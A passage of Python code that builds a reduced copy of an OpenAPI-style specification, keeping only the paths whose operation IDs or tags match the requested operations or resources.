    wanted_ops = operations or []
    wanted_resources = resources or []

    # Carry over every top-level key except 'paths', which is rebuilt below
    # with only the retained entries.
    minimized = {}
    for key, value in spec_dict.items():
        if key != 'paths':
            minimized[key] = value
    minimized['paths'] = {}

    for path_name, methods in spec_dict['paths'].items():
        for method, data in methods.items():
            keep = data['operationId'] in wanted_ops
            if not keep:
                keep = any(tag in wanted_resources for tag in data['tags'])
            if keep:
                minimized['paths'].setdefault(path_name, {})[method] = data
    return minimized
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.